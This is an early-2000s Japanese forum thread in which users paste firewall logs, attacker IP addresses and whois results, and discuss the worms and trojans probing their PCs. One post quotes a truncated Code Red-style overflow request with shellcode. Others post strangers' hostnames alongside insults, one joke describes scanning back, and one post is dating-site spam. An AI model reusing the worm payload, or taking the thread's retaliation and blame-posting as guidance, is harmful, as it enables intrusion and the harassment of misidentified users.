FWIN,2003/09/08,18:44:58 +9:00 GMT,211.10.246.139:80,192.168.1.100:2872,TCP (flags:S)
FWIN,2003/09/08,18:45:42 +9:00 GMT,211.10.246.144:80,192.168.1.100:2859,TCP (flags:S)
FWIN,2003/09/08,18:46:02 +9:00 GMT,211.10.246.144:80,192.168.1.100:2903,TCP (flags:S)
FWIN,2003/09/08,18:46:12 +9:00 GMT,211.10.246.144:80,192.168.1.100:2964,TCP (flags:S)
FWIN,2003/09/08,18:46:16 +9:00 GMT,211.10.246.139:80,192.168.1.100:2948,TCP (flags:S)
FWIN,2003/09/08,18:46:42 +9:00 GMT,211.10.246.144:80,192.168.1.100:2902,TCP (flags:S)
FWIN,2003/09/08,18:46:48 +9:00 GMT,211.10.246.144:80,192.168.1.100:2868,TCP (flags:S)
FWIN,2003/09/08,18:46:48 +9:00 GMT,211.10.246.139:80,192.168.1.100:2952,TCP (flags:S)
FWIN,2003/09/08,18:46:56 +9:00 GMT,211.10.246.139:80,192.168.1.100:2773,TCP (flags:S)
FWIN,2003/09/08,18:46:58 +9:00 GMT,211.10.246.139:80,192.168.1.100:2872,TCP (flags:S)
FWIN,2003/09/08,18:47:02 +9:00 GMT,211.10.246.139:80,192.168.1.100:2894,TCP (flags:S)
FWIN,2003/09/08,18:47:04 +9:00 GMT,211.10.246.139:80,192.168.1.100:2879,TCP (flags:S)
FWIN,2003/09/08,18:47:40 +9:00 GMT,211.10.246.139:80,192.168.1.100:2954,TCP (flags:S)
202.212.115.106 211.5.1.243 uzeeeeeeeeeee
>>814 それは、ウェブのアクセスの戻りのパケットを誤認したと見せかけた
ポートスキャンに違いない。
攻撃されたので 一応晒しときまつ 211.1.235.247
明石らしいですが・・・ お心当たりの方は ↓ に、お問い合わせを。
03/08/24 20:33 HOST:61-195-150-89.cust.bit-drive.ne.jp 2ch日本史で何回も事実無根の誹謗中傷を書き立てるなよ! 個人サイトにも、1日に10回もアクセスしたりして・・・
821 :
名無しさん@お腹いっぱい。 :03/09/12 03:38
俺には攻撃される価値があるなぁ。
823 :
名無しさん@お腹いっぱい。 :03/09/12 17:38
zaqd38758b9.zaq.ne.jp 211.135.88.185
825 :
名無しさん@お腹いっぱい。 :03/09/14 01:02
IPアドレス 219.160.209.208 ホスト名 p3208-ipad02otsu.shiga.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 滋賀県 市外局番 -- 接続回線 xDSL
826 :
名無しさん@お腹いっぱい。 :03/09/14 01:03
IPアドレス 219.160.209.208 ホスト名 p3208-ipad02otsu.shiga.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 滋賀県 市外局番 -- 接続回線 xDSL
827 :
名無しさん@お腹いっぱい。 :03/09/14 09:26
220.209.99.105
828 :
名無しさん@お腹いっぱい。 :03/09/14 15:26
220.209.99.105 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.209.75.0-220.209.182.0 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.) 粘着アタッカー
32.103.25.252[slip-32-103-25-252.ca.us.preserv.net] 侵入:Invalid TCP Source Port いつもはトロイの木馬が多いのに、珍しいな。
830 :
名無しさん@お腹いっぱい。 :03/09/14 20:17
218.178.238.35
831 :
名無しさん@お腹いっぱい。 :03/09/14 23:10
んで・・・、 何度も言うようだけど踏み台晒してなんか楽しい?
832 :
名無しさん@お腹いっぱい。 :03/09/14 23:21
みなさんアタックされたらどうしてるのですか? 報復するのですか?
攻撃とは限らない。ただのポートスキャンに一々反応してられるか。
俺、暇なときはポートスキャン返してるけどなぁ。 挨拶されたら挨拶返しなさいと、死んだばぁちゃんも言ってたし。
むしろ、通行人と目が合っただけで挨拶してるよう。
219.12.116.51
129.71.16.159
838 :
名無しさん@お腹いっぱい。 :03/09/18 01:50
ポートをブロックするプログラムをいれてますが 2ちゃんを閲覧していたら、2ちゃんのアドレス 64.71.145.43(2ch.net)から自マシンの ポート2770と2766に対するアクセスが2件ありました。 こういったことがある方他に居られるでしょうか? またどういった原因が考えられますでしょうか。
81.218.189.14
24.154.111.127
841 :
名無しさん@お腹いっぱい。 :03/09/18 07:06
220.104.1.107
842 :
名無しさん@お腹いっぱい。 :03/09/19 19:24
(1) Received: from remt21.cluster1.charter.net (remt21.cluster1.charter.net [209.225.8.31])by mail512.nifty.com with ESMTP id h8J6HdF9012653 for <******>; Fri, 19 Sep 2003 15:17:39 +0900 Received: from [66.168.197.67] (HELO mkid) ~~~~~~~~~~~~~ by remt21.cluster1.charter.net (CommuniGate Pro SMTP 4.0.6) with SMTP id 163170716; Fri, 19 Sep 2003 02:17:22 -0400 (2) Received: from remt30.cluster1.charter.net (remt30.cluster1.charter.net [209.225.8.40])by mail522.nifty.com with ESMTP id h8J6FO97012818 for <******>; Fri, 19 Sep 2003 15:15:25 +0900 Received: from [66.168.197.67] (HELO uugmgp) ~~~~~~~~~~~~~ by remt30.cluster1.charter.net (CommuniGate Pro SMTP 4.0.6) with SMTP id 32267368; Fri, 19 Sep 2003 02:15:03 -0400 (3) Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43])by mail523.nifty.com with ESMTP id h8CLQcXc012010 for <******>; Sat, 13 Sep 2003 06:26:39 +0900 Received: from DrJiR ([80.5.46.35]) by mta03-svc.ntlworld.com ~~~~~~~~~~ (InterMail vM.4.01.03.37 201-229-121-137-20020806) with SMTP id <20030912212620.GKNK19737.mta03-svc.ntlworld.com@DrJiR>; Fri, 12 Sep 2003 22:26:20 +0100
843 :
名無しさん@お腹いっぱい。 :03/09/19 19:26
(4) Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])by mail507.nifty.com with ESMTP id h7E0EG18008557 for <******>; Thu, 14 Aug 2003 09:14:16 +0900 Message-Id: <******@mail507.nifty.com> Date: Thu, 14 Aug 2003 00:14:05 +0000 (GMT) X-Comment: Sending client does not conform to RFC822 minimum requirements X-Comment: Date has been added by Maillennium. Received: from kkmUQ (12-241-35-137.client.attbi.com[12.241.35.137](untrusted sender)) ~~~~~~~~~~~~~ by comcast.net (rwcrmhc11) with SMTP id <20030814001359013006k5h8e>; Thu, 14 Aug 2003 00:14:03 +0000 (5) Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])by mail507.nifty.com with ESMTP id h7E0EG18008557 for <******>; Thu, 14 Aug 2003 09:14:16 +0900 Message-Id: <******@mail507.nifty.com> Date: Thu, 14 Aug 2003 00:14:05 +0000 (GMT) X-Comment: Sending client does not conform to RFC822 minimum requirements X-Comment: Date has been added by Maillennium. Received: from kkmUQ (12-241-35-137.client.attbi.com[12.241.35.137](untrusted sender)) ~~~~~~~~~~~~~~ by comcast.net (rwcrmhc11) with SMTP id <20030814001359013006k5h8e>; Thu, 14 Aug 2003 00:14:03 +0000
(6) Received: from allcom.gdynia.pl (mail.allcom.gdynia.pl [193.91.30.26])by mail521.nifty.com with ESMTP id h8JBp6xJ001141 ~~~~~~~~~~~~ for <******>; Fri, 19 Sep 2003 20:51:15 +0900 Received: from localhost (localhost [127.0.0.1]) by allcom.gdynia.pl (Postfix) with ESMTP id 8CC1D7FC70; Fri, 19 Sep 2003 13:48:09 +0200 (CEST) Received: from allcom.gdynia.pl ([127.0.0.1]) by localhost (allcom [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 31423-03; Fri, 19 Sep 2003 13:48:08 +0200 (CEST) Received: from ltxgj (unknown [10.100.5.145]) by allcom.gdynia.pl (Postfix) with SMTP id 325957FC66; Fri, 19 Sep 2003 13:48:08 +0200 (CEST)
pcd383230.netvigator.com
846 :
名無しさん@お腹いっぱい。 :03/09/19 21:36
Internet Assigned Numbers Authority これってどこの会社だよ。 激しくうざいんだけど
(7) Received: by mail54.nifty.com id 3f6b3d6b5fe34e; Sat, 20 Sep 2003 02:31:23 +0900 Received: from ms-smtp-01.southeast.rr.com (ms-smtp-01.southeast.rr.com [24.93.67.82])by mail511.nifty.com with ESMTP id h8JHVGsb029649 for <********>; Sat, 20 Sep 2003 02:31:17 +0900 Received: from nqeflqt (clt56-125-103.carolina.rr.com [66.56.125.103]) ~~~~~~~~~~~~~ by ms-smtp-01.southeast.rr.com (8.12.5/8.12.2) with SMTP id h8JHKG0Q001412; Fri, 19 Sep 2003 13:20:17 -0400 (EDT)
220.108.225.230 さっきからTCP/445ばっか叩いてんじゃねえよ。
849 :
名無しさん@お腹いっぱい。 :03/09/22 21:58
127.0.0.1 このひとしつこい
211.93.13.166
853 :
名無しさん@お腹いっぱい。 :03/09/26 02:23
会社のWeb鯖にアノニでログインしようとするんだが、何がしたいんだこの糞会社?
219.106.138.196 UNKNOWN nobody [23/Sep/2003:01:13:34 +0900] "USER anonymous" 331 -
219.106.138.196 UNKNOWN nobody [23/Sep/2003:01:13:34 +0900] "PASS (hidden)" 530 -
[IPネットワークアドレス] 219.106.136.0-219.106.143.0
[ネットワーク名] BAI-CATV
[組織名] アイテック阪神株式会社
[Organization] ITEC HANSHIN CO.,LTD.
[運用責任者] NH183JP
[技術連絡担当者] TM947JP
[技術連絡担当者] TK588JP
[ネームサーバ] ns1.gao.ne.jp
[ネームサーバ] ns2.gao.ne.jp
[通知アドレス]
[email protected]
カスども、まだやってるのか?
68.20.216.234
856 :
名無しさん@お腹いっぱい。 :03/09/26 12:49
202.8.29.213
218.13.198.21
858 :
名無しさん@お腹いっぱい。 :03/09/27 00:56
sttldslgw9poole163.sttl.uswest.net - - [27/Sep/2003:00:39:21 +0900] "GET /frame.jpg?1064038450843 HTTP/1.0" 403 1067 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" こういうのが約30秒おきに飛んでくる。
xx-22x-8x-15x.hinet-ip.hinet.net - - [26/Sep/2003:18:12:59 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890% u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000% ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x つづく
172.160.173.250
200.153.234.82
200-153-234-82.dsl.telesp.net.br
68.161.60.70 今晩はしつこい。
864 :
名無しさん@お腹いっぱい。 :03/09/27 22:56
韓国がウザい。
865 :
名無しさん@お腹いっぱい。 :03/09/27 23:14
SRC=220.108.220.155 LEN=48 TOS=0x00 PREC=0x00 TTL=128 ID=50649 DF PROTO=TCP SPT=3333 DPT=445 WINDOW=65535 RES=0x00 SYN URGP=0 こんな感じで30分以上。。。ログの行数数えるのも だるい。
866 :
名無しさん@お腹いっぱい。 :03/09/28 00:31
219.111.157.84 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.111.128.0-219.111.191.0 b. [ネットワーク名] SO-NET f. [組織名] SO-Net サービス g. [Organization] SO-Net Service
62.178.106.132
868 :
fushianasan :03/09/28 10:55
210.52.154.0
869 :
名無しさん@お腹いっぱい。 :03/09/28 12:42
ブレーメンの不正侵入隊 134.102.65.110:111
81.86.202.132
65.33.228.75
68.164.56.56
IPアドレス 211.134.86.52 ホスト名 O086052.ppp.dion.ne.jp 接続回線 xDSL 他
61.124.67.96 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.)
875 :
名無しさん@お腹いっぱい。 :03/10/03 00:57
169.254.0.8 一ヶ月も前から日参されてうざい…。 しかも1分間に100回を越えるアタックでルーター止まるし…(←根性なし)w 横文字苦手なんで何処からやらワカラン。 OrgName: Internet Assigned Numbers Authority OrgID: IANA Address: 4676 Admiralty Way, Suite 330 City: Marina del Rey StateProv: CA PostalCode: 90292-6695 Country: US NetRange: 169.254.0.0 - 169.254.255.255 CIDR: 169.254.0.0/16 NetName: LINKLOCAL NetHandle: NET-169-254-0-0-1 Parent: NET-169-0-0-0-0 NetType: IANA Special Use NameServer: BLACKHOLE-1.IANA.ORG NameServer: BLACKHOLE-2.IANA.ORG Comment: Please see RFC 3330 for additional information. RegDate: 1998-01-27 Updated: 2002-10-14
>>875 ローカルアドレスとは何か勉強すると、あなたが貼ったWhoisが恥ずかしくなるよ。
61.185.218.154
211.183.93.215:1735
210.15.11.115 220.220.105.54 61.196.2.176
68.32.116.168
68.248.122.13:1129
884 :
名無しさん@お腹いっぱい。 :03/10/04 07:56
219.104.103.67 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.104.0.0-219.104.255.0 b. [ネットワーク名] INFOWEB f. [組織名] InfoWeb(富士通株式会社) g. [Organization] InfoWeb(Fujitsu Ltd.)
↑カス供死ね。
67.202.109.53
887 :
名無しさん@お腹いっぱい。 :03/10/05 00:24
888 :
名無しさん@お腹いっぱい。 :03/10/05 01:08
低脳どもはどうして低脳といわれているかわからないようだ。
これは犯罪文ですか? 「●の仲間でいることを恥たほうがいい。 ●が出入りしてるせいで、いつのまにか友達減ったの気づいてないの? 自分では普通のつもりでも、周りは同じ人種と判断するからねぇ… そして、何がすごいって、●、まじであっちこっちで嫌われてるね。 知らないところで悪口言われてるよ。 こんなに嫌がられてる人も珍しいよなぁ…はじめてみたかも。 相変わらず悪口たくさんかかれてる鼻つまみ者」 これを公の場で書く奴 しかも、嘘ばっかり言いふらしてます。HP管理妨害です。 これは偽証罪では? こいつのせいで、えん罪ですよ。
890 :
名無しさん@お腹いっぱい。 :03/10/08 21:43
218.222.143.166 U143166.ppp.dion.ne.jp
↑また来たか。屑。
64.4.22.24
893 :
名無しさん@お腹いっぱい。 :03/10/09 20:11
92.163.3.1 OrgName: Texas Instruments OrgID: TEXASI-4 Address: 13500 North Central Expressway City: Dallas StateProv: TX PostalCode: 75243 Country: US NetRange: 192.163.3.0 - 192.163.3.255 CIDR: 192.163.3.0/24 NetName: TISPDC-3 NetHandle: NET-192-163-3-0-1 Parent: NET-192-0-0-0-0 NetType: Direct Assignment Comment: RegDate: 1992-05-08 Updated: 1992-05-08 # ARIN WHOIS database, last updated 2003-10-08 19:15 # Enter ? for additional hints on searching ARIN's WHOIS database.
ホスト名: adsl-67-116-216-25.dsl.sndg02.pacbell.net IPアドレス: 67.116.216.25 ここから攻撃を受けているんですけど、なんなんでしょうか。 ほかにもたくさんくるんですけど。主にアメリカみたい。
895 :
80.182.119.102:1112 :03/10/10 21:03
IPアドレス 80.182.119.102 ホスト名 host102-119.pool80182.interbusiness.it 割当国 ※ イタリア (IT)
896 :
名無しさん@お腹いっぱい。 :03/10/11 02:37
φ( ..) BlackICE PC Protectionによると 遮断状況, 侵入者 1, zaqd378a033.zaq.ne.jp 1, public4-seve1-3-cust14.lond.broadband.ntl.com 英国ケンブリッジ 1, pcp444009pcs.savana01.ga.comcast.net 米国アトランタ 1, p5019-ipad01tokusinwcc.tokushima.ocn.ne.jp 1, p1177-ipbf07hodogaya.kanagawa.ocn.ne.jp 1, nttkyo145077.tkyo.nt.ftth2.ppp.infoweb.ne.jp 1, ntfkok053042.fkok.nt.ftth.ppp.infoweb.ne.jp 1, nissin42100.ccnw.ne.jp 1, i211099.ppp.asahi-net.or.jp 1, gate80.people-i.ne.jp 1, flhyg1-p194.hi-ho.ne.jp 1, adsl-66-136-95-70.dsl.rcsntx.swbell.net 米国テキサス州リチャードソン 1, adsl-158-181-135.mia.bellsouth.net 米国マイアミ州 1, aa2001080079003.userreverse.dion.ne.jp 1, YahooBB221090008001.bbtec.net 1, YahooBB220043232122.bbtec.net 1, YahooBB220043232051.bbtec.net 1, YahooBB219186232002.bbtec.net 1, YahooBB219025144008.bbtec.net 1, YahooBB219006058012.bbtec.net 1, U015106.ppp.dion.ne.jp 1, FLH1Aah253.sig.mesh.ad.jp 1, 64.49.220.233 米国カリフォルニア州バーバンク 1, 61-22-163-229.home.ne.jp 1, 218.90.217.206 中国 北京 中国 北京は(パロ・アルト経由)サンフランシスコ近郊の都市を経由 1, 218.234.128.2 韓国ソウル 1, 218.231.78.9.eo.eaccess.ne.jp 1, 211.75.173.44 台湾 1, 198.209.2.162 米国イリノイ州
897 :
名無しさん@お腹いっぱい。 :03/10/11 02:54
医療法人千徳会 何か用?
4.43.174.223
900 :
名無しさん@お腹いっぱい。 :03/10/11 07:32
>>899 さん
4.43.174.223は、エヴェレット(シアトルの近くにある街)からの
アタックです。
カリフォルニア州ミルピタス経由で899さんのPCまで来たみたいです。
VisualRoute日本語版で追跡して解った事の詳細↓(一部不要な所をカット済み)
Verizon Trademark Services LLC
[email protected] Verizon Trademark Services LLC
1320 North Court House Road
Arlington, VA 22201
US
1-9727187621
FAX: 1-9727183946
Domain Name: DSL-VERIZON.NET
Domain Status: Client Locked
Administrative Contact:
Christian R. Andersen
[email protected] Verizon
600 Hidden Ridge Drive HQE03H01
Irving, TX 75038
US
1-9727187621
Record last updated on:..2002-04-04 00:00:00.0
Record expires on:.......2005-04-04 00:00:00.0
Record created on:.......2002-04-04 00:00:00.0
Domain Name Servers:
dnsauth1.sys.gtei.net 4.2.49.2
dnsauth2.sys.gtei.net 4.2.49.3
901 :
名無しさん@お腹いっぱい。 :03/10/11 08:18
902 :
名無しさん@お腹いっぱい。 :03/10/11 19:48
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.238.32.0-202.238.39.0
b. [ネットワーク名] MICSNET
f. [組織名] 株式会社西三河ニューテレビ放送
g. [Organization] Nishimikawa New-TV Broadcasting CORPORATION
m. [運用責任者] YN2945JP
n. [技術連絡担当者] JN445JP
n. [技術連絡担当者] KI4020JP
n. [技術連絡担当者] KM1184JP
n. [技術連絡担当者] TS7372JP
p. [ネームサーバ] ns.catvmics.ne.jp
y. [通知アドレス]
[email protected] y. [通知アドレス]
[email protected] [割当年月日] 2001/03/16
[最終更新] 2002/01/21 10:37:31 (JST)
[email protected]
03/07/27の23:18:24〜23:37:25に渡って計21回
904 :
24.158.189.224 :03/10/12 01:55
24.158.189.224
905 :
名無しさん@お腹いっぱい。 :03/10/12 10:04
今日3回目 24.44.221.134
906 :
210.186.58.164:1101 :03/10/12 13:27
210.186.58.164:1101
907 :
名無しさん@お腹いっぱい。 :03/10/12 13:53
62.163.180.166
908 :
名無しさん@お腹いっぱい。 :03/10/12 15:51
cpe-024-211-082-036.sc.rr.com
909 :
名無しさん@お腹いっぱい。 :03/10/12 16:43
43.244.38.176 43.244.160.219 43.244.244.190 詳しい人、教えてください。 毎日100回くらい、ログに残ってるの。 43.244までは、同じだけど、後ろの数字が変化してます。
>>909 範囲が同じなら、全部範囲でブロックしたら?
43.1.1.1〜43.255.255.255で。
なんか今日はやたらと俺もアタックが多い。
1時間で4回ぐらい違うIPからきた。
しかも、全部海外。
912 :
名無しさん@お腹いっぱい。 :03/10/12 16:56
>>909 ■43.244.160.219■
a. [Domain Name] YOURNET.NE.JP
d. [Network Service Name] FreeBit.Net Service
l. [Organization Type] Network Service
m. [Administrative Contact] TS6060JP
n. [Technical Contact] TI151JP
p. [Name Server] ns1.freebit.net
p. [Name Server] ns2.freebit.net
y. [Reply Mail]
[email protected] [State] Connected (2004/04/30)
[Registered Date] 2003/04/25
[Connected Date] 2003/05/02
[Last Update] 2003/05/02 10:53:04 (JST)
全部同じとこからみたいだよYOURNET.NE.JP使ってるんだろ?
ここ↓を利用して調べてみたらいいよ!
。VisualRoute - Next IT Inc. JAPAN 。
http://visualroute.next-it.com/vr.html
913 :
名無しさん@お腹いっぱい。 :03/10/12 16:57
>>911 オレも昨日の夜中から10回以上アタックされてる・・・
同じような人が他にもいるのかな
914 :
名無しさん@お腹いっぱい。 :03/10/12 17:00
915 :
名無しさん@お腹いっぱい。 :03/10/12 17:05
213.208.116.134 221.158.23.68 65.69.87.153 219.1.121.136 218.254.36.156 219.1.242.86 218.254.117.88 65.24.236.202 24.167.128.242 66.93.152.58 63.161.178.66 66.93.152.58 67.117.47.95 202.115.204.182 68.145.211.158 24.85.64.19 4.41.130.147 61.10.18.48 10〜30秒ごとに色んな所からきてるんですがなんでしょうかね? PCつけて1時間で500こえてます。
916 :
名無しさん@お腹いっぱい。 :03/10/12 17:20
>>910 ,911,912,913,914さん
教えてくれてありがと〜
ブロックとか、がんばってやって見ます
919 :
名無しさん@お腹いっぱい。 :03/10/12 18:15
24.217.210.2
>>913 普段は1ヶ月に2回ぐらいなんだけど、昨日今日とやたら多いよねぇ。
なんか新種のウイルスが出てたりしてw
>>918 ノートン使ってるなら、ファイアウォール→インターネットゾーン制御
でやるとよろし。(ちなみに2002ね)
時間, イベント, 侵入者, 侵入者の IP, カウント, 宛先ポート, 発信元ポート 2003/10/11 18:19:03, UDP_Probe_Other, p0733-ip01okayamaima.okayama.ocn.ne.j○, ○1.119.190.225, 356, 2350, 69 2003/10/11 18:18:02, UDP_Probe_Other, p0733-ip01okayamaima.okayama.ocn.ne.j○, 61.119.190.22○, 21, 2350, 69 2003/10/11 18:17:44, UDP_Probe_Other, p0733-ip01okayamaima.okayama.ocn.ne.j○, 61.119.190.22○, 460, 2350, 69 ネトゲの厨房が調子に乗ってる
922 :
名無しさん@お腹いっぱい。 :03/10/12 20:50
24.199.192.33 ここから、さっきから8回きました。 トロイの木馬の危険とか出ました。
924 :
名無しさん@お腹いっぱい。 :03/10/12 22:10
俺もY!BBだがトロイがしつこい……。 ↓こいつ氏ね。 80.213.103.225
まだアタックしまくられています。 初めは海外が多かったのですが今は国内のIPアドレスからもきています。 1分間に3〜8回程きてます。 どうしたらいいんだ・・・。
Port:17300?
あのさーアタッカーって一体何か聞いていいか…?
928 :
名無しさん@お腹いっぱい。 :03/10/12 22:56
ドゾ!(ry
トロイ祭り開催中だな。
930 :
名無しさん@お腹いっぱい。 :03/10/12 23:56
トロイ来まくってるけど全部国が違う。 どういうこった?
931 :
名無しさん@お腹いっぱい。 :03/10/13 00:27
本当にどうしたんだろう?トロイが私も来まくってる・・・・
932 :
名無しさん@お腹いっぱい。 :03/10/13 01:09
送信先ポート10000はやばいの?
933 :
212.95.105.243:4523 :03/10/13 01:54
212.95.105.243:4523 今度はドイツだー。
934 :
名無しさん@お腹いっぱい。 :03/10/13 02:11
935 :
名無しさん@お腹いっぱい。 :03/10/13 02:55
>>929-931 同じくここ2〜3日、Backdoor.SubSevenのトロイが
米国、オランダ、カナダなどから頻繁に来ている
なぜだ?
936 :
名無しさん@お腹いっぱい。 :03/10/13 20:40
[Domain Name] LIVEDOOR.JP [Name] Kato Shinagawa-ku, Tokyo [Phone] 03-5749-9***
テキサス大学…踏み台?
939 :
名無しさん@お腹いっぱい。 :03/10/14 00:35
219.115.85.207 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.115.0.0-219.115.187.0 b. [ネットワーク名] JCOM-NET f. [組織名] 株式会社ジェイコム関西 木馬ヤロウ
940 :
名無しさん@お腹いっぱい。 :03/10/14 01:53
あかんたれな ハッカーたち pcp01184969pcs.strl301.mi.comcast.net crtntx1-ar5-4-63-100-166.crtntx1.dsl-verizon.net cpe-024-211-082-036.sc.rr.com clt25-68-029.carolina.rr.com 68.58.120.139 貧乏人一覧 と言う事にしとく... どうせ日本語しかわからんのやから文句も言えんしな、俺(ry
941 :
名無しさん@お腹いっぱい。 :03/10/14 18:08
218.47.15.220 さっきからうざいよ plala
942 :
名無しさん@お腹いっぱい。 :03/10/14 18:13
1.【IPアドレス:24.226.86.48】 IPアドレス24.226.86.48 ホスト名d226-86-48.home.cgocable.net IPアドレス 割当国 ※カナダ (CA) 都道府県該当なし 市外局番該当なし 接続回線該当なし Whois 検索結果 IPアドレス 所有者情報24.226.86.48 を whois.arin.net で検索しましたCogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1) 24.226.0.0 - 24.226.127.255 Cogeco Cable Solutions CGOC-KICO4-1 (NET-24-226-80-0-1) 24.226.80.0 - 24.226.95.255 2.【IPアドレス:202.106.104.210】 検索結果 IPアドレス202.106.104.210 ホスト名対応するホスト名がありません IPアドレス 割当国 ※中国 (CN) 都道府県該当なし 市外局番該当なし 接続回線該当なし Whois 検索結果 IPアドレス 所有者情報Whois Server にアクセスできません。
943 :
名無しさん@お腹いっぱい。 :03/10/14 19:04
2003/10/14 18:45:53頃下記のIPアドレスの持ち主からハッキングされそうになりました。 TCP_Probe_Other, cpe-024-165-126-251.cinci.rr.com 【IPアドレス 24.165.126.251】 検索結果 IPアドレス24.165.126.251 ホスト名cpe-024-165-126-251.cinci.rr.com IPアドレス 割当国 ※アメリカ合衆国 (US) 都道府県該当なし 市外局番該当なし 接続回線該当なし Whois 検索結果 IPアドレス 所有者情報24.165.126.251 を whois.arin.net で検索しました OrgName: Road Runner OrgID: RRMA Address: 13241 Woodland Park Road City: Herndon StateProv: VA PostalCode: 20171 Country: US
Whoisを貼るだけなら猿でも出来るな。
時間, イベント, 侵入者, 侵入者の IP, カウント, 宛先ポート, 発信元ポート 2003/10/14 18:48:58, UDP_Probe_Other, p4121-ip01okayamaima.okayama.ocn.ne.jp, 61.126.163.122, 583, 2350, 2350
946 :
名無しさん@お腹いっぱい。 :03/10/14 20:44
どうやってアタッカーのIPを調べるのですか?
火壁のログ見れ
948 :
名無しさん@お腹いっぱい。 :03/10/14 22:58
219.110.61.210 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.110.61.0 b. [ネットワーク名] ITSCOM-NET f. [組織名] イッツ・コミュニケーションズ株式会社 g. [Organization] its communications Inc.
210.254.104.117 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.254.102.0-210.254.106.0 b. [ネットワーク名] BAYNET1 f. [組織名] 東京ベイネットワーク株式会社 g. [Organization] Tokyo Bay Network Co.,Ltd
211.3.61.158 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.3.0.0-211.3.255.0 b. [ネットワーク名] ODN f. [組織名] オープンデータネットワーク(日本テレコム株式会社) g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
211.0.179.186 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.0.160.0-211.0.255.0 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network
211.125.196.137 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.125.196.0-211.125.199.0 b. [ネットワーク名] BAI-CATV f. [組織名] アイテック阪神株式会社 g. [Organization] ITEC HANSHIN CO.,LTD.
61.119.244.148 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.119.128.0-61.119.255.0 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network
211.122.64.52 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 211.122.0.0-211.122.255.0 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network
219.140.161.27 inetnum: 219.140.0.0 - 219.140.255.255 netname: CHINANET-HB-WH country: CN descr: Chinanet network in Wuhan city Hubei province
1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:21863->localhost:3128, Owner: no owner 1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:25592->localhost:3129, Owner: no owner 1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:23314->localhost:4480, Owner: no owner 1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:23893->localhost:6588, Owner: no owner 1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:24313->localhost:8088, Owner: no owner 1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:22787->localhost:34344, Owner: no owner 1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:25327->localhost:38382, Owner: no owner 1,[16/Oct/2003 01:34:33] Blocked: In TCP, 151.27.29.6:21283->localhost:43344, Owner: no owner
957 :
名無しさん@お腹いっぱい。 :03/10/16 22:27
なんか 今日は、135ポートに、いろんなところからしつこいんだが なんかあったのか? 知ってる人教えて。
958 :
名無しさん@お腹いっぱい。 :03/10/16 23:37
959 :
名無しさん@お腹いっぱい。 :03/10/17 00:50
【WORM_MSBLAST.D miniFAQ 一般的なお話】 Q このICMPの接続要求って攻撃されてるってこと? A このウィールス(正確にはワーム)はICMP(2048)を自分の周囲のPCに猛烈に打ち まくり、返事があるとport135というドアから入りこみます。鯖立ててる場合以外は ファイアウォールでport135を閉めておけばOK。ping自体は無害です。 って事ですか、ポートは閉じてあるのですが、かなりウザイですね。 ブラスターって事ですねw
960 :
名無しさん@お腹いっぱい。 :03/10/17 03:05
ここ、かなりいいよ。
システムがシンプルで使いやすいから出会い系初心者の女の子が多いみたい。
だから笑っちゃうくらい簡単に落ちるんだ。
おととい遊んだ池袋の子なんてメール3回で陥落!
ハッキリ言って入れ食い状態です(笑)
サクラばっかりの出会い系にウンザリって人、騙されたと思って覗いてみて。
無料ポイントもたっぷりもらえるしお金使う心配はないと思うよ。
(ちなみに俺は3人の子と会ったけどまだ一円も使ってません。(笑))
http://www.com1.info/ どうぞ <a href="
http://www.com1.info/ ">穴場発見!</a> サイトにお越しください
218.229.196.163
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
961 :
名無しさん@お腹いっぱい。 :03/10/17 18:23
